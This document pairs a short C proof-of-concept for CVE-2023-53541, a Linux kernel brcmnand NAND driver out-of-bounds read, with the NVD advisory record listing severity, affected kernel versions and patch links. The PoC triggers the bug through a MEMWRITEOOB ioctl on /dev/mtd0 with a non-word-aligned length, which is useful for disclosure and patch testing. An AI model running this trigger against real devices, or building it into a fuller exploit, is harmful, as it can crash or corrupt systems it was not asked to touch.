CVE-2023-53541

/* * CVE-2023-53541 PoC - Linux Kernel brcmnand OOB Out-of-Bounds Read * * This PoC demonstrates the vulnerability by writing OOB data with * a length that is not word-aligned, triggering an out-of-bounds read * on the source buffer in the brcmnand driver. * * Note: This requires a system with Broadcom NAND controller and * appropriate device permissions (e.g., /dev/mtd* access). */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #include <mtd/mtd-user.h> int main(int argc, char *argv[]) { int fd; int ret; struct mtd_oob_buf oob; const char *dev = "/dev/mtd0"; /* Allocate a buffer with non-word-aligned length to trigger the bug */ /* Word size is 4 bytes; using length 5 (not multiple of 4) */ unsigned char *buf = (unsigned char *)malloc(5); if (!buf) { perror("malloc"); return 1; } /* Fill with known pattern */ memset(buf, 0xAA, 5); /* Open the MTD device */ fd = open(dev, O_RDWR); if (fd < 0) { perror("open"); free(buf); return 1; } /* Setup OOB write operation */ oob.start = 0; oob.length = 5; /* Non-word-aligned length triggers OOB read */ oob.ptr = buf; /* Attempt OOB write - this triggers out-of-bounds read on the source */ ret = ioctl(fd, MEMWRITEOOB, &oob); if (ret < 0) { perror("MEMWRITEOOB"); } else { printf("OOB write completed. Potential OOB read may have occurred.\n"); } close(fd); free(buf); return 0; }

{"cve": {"id": "CVE-2023-53541", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:49.160", "lastModified": "2026-03-25T00:41:59.910", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmtd: rawnand: brcmnand: Fix potential out-of-bounds access in oob write\n\nWhen the oob buffer length is not in multiple of words, the oob write\nfunction does out-of-bounds read on the oob source buffer at the last\niteration. Fix that by always checking length limit on the oob buffer\nread and fill with 0xff when reaching the end of the buffer to the oob\nregisters."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.2", "versionEndExcluding": "4.14.326", "matchCriteriaId": "47178EA3-9838-42AF-90AA-F3E84BDF403D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.295", "matchCriteriaId": "D419C7D6-F33D-4EF8-8950-1CB5DDF6A55D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.257", "matchCriteriaId": "834BD148-28EC-43A4-A4F5-458124A1E39F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.195", "matchCriteriaId": "C385B650-53DB-4BFB-83D1-1D8FADF653EF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.132", "matchCriteriaId": "5913891D-409A-4EEC-9231-F2EF5A493BC7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.54", "matchCriteriaId": "7353B9B4-AFFC-45DE-840E-1A7D2B00E7AD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.5.4", "matchCriteriaId": "CA8C8B88-AF36-445D-A228-AD78F3615373"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/14b1d00520b4d6a4818364334ce472b79cfc8976", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/2353b7bb61e45e7cfd21505d0c6747ac8c9496a1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/2bc3d6ac704ea7263175ea3da663fdbbb7f3dd8b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/45fe4ad7f439799ee1b7b5f80bf82e8b34a98d25", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5d53244186c9ac58cb88d76a0958ca55b83a15cd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/648d1150a688698e37f7aaf302860180901cb30e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/aae45746f4aee9818296e0500e0703e9d8caa5b8", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d00b031266514a9395124704630b056a5185ec17", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}